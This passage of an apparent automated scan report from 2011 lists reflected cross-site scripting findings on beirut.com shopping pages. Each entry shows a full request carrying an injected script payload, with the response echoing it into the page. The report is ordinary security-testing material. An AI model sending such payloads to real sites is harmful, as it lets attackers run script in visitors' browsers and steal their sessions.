var indexpage='Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59539a8'-alert(1)-'a6628b9a17d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1031. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cac4'-alert(1)-'3f7af3835c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping6cac4'-alert(1)-'3f7af3835c1/Home-Furnishings/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:27:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping6cac4'-alert(1)-'3f7af3835c1/Home-Furnishings/4120758082/Tapistry/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1032. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57b69"><a>fb485ccb691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping57b69"><a>fb485ccb691/Home-Furnishings/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping57b69"><a>fb485ccb691">
...[SNIP]...

4.1033. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93c8b'-alert(1)-'d454699a4c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings93c8b'-alert(1)-'d454699a4c0/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings93c8b'-alert(1)-'d454699a4c0/4120758082/Tapistry/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1034. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6e66<script>alert(1)</script>3dbb24eb2ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsa6e66<script>alert(1)</script>3dbb24eb2ec/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsa6e66<script>alert(1)</script>3dbb24eb2ec <a href="#" id="backlink">
...[SNIP]...

4.1035. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0da9'-alert(1)-'32c6966655f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082d0da9'-alert(1)-'32c6966655f/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:40:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082d0da9'-alert(1)-'32c6966655f/Tapistry/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1036. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b065'-alert(1)-'1624f652c94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Tapistry2b065'-alert(1)-'1624f652c94/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Tapistry2b065'-alert(1)-'1624f652c94/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1037. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaa13'-alert(1)-'14f1b8ace88 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Tapistry/50eaa13'-alert(1)-'14f1b8ace88 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Tapistry/50eaa13'-alert(1)-'14f1b8ace88';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1038. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ce1"><a>5288377418 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping15ce1"><a>5288377418/Home-Furnishings/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping15ce1"><a>5288377418">
...[SNIP]...

4.1039. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a640a'-alert(1)-'45f99ddf7ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinga640a'-alert(1)-'45f99ddf7ee/Home-Furnishings/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shoppinga640a'-alert(1)-'45f99ddf7ee/Home-Furnishings/4120758082/Textiles/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1040. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2963<script>alert(1)</script>66480a50eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsc2963<script>alert(1)</script>66480a50eeb/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsc2963<script>alert(1)</script>66480a50eeb <a href="#" id="backlink">
...[SNIP]...

4.1041. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4920'-alert(1)-'e0969ad4d83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingse4920'-alert(1)-'e0969ad4d83/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishingse4920'-alert(1)-'e0969ad4d83/4120758082/Textiles/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1042. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2caff'-alert(1)-'f977dcaee9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/41207580822caff'-alert(1)-'f977dcaee9a/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:42:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/41207580822caff'-alert(1)-'f977dcaee9a/Textiles/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1043. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da01f'-alert(1)-'1ec5f28cd68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Textilesda01f'-alert(1)-'1ec5f28cd68/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:49:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Textilesda01f'-alert(1)-'1ec5f28cd68/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1044. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78fd0'-alert(1)-'f64efe3a9fd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Textiles/478fd0'-alert(1)-'f64efe3a9fd HTTP/1.1
Host: www.beirut.com
Accept: */*
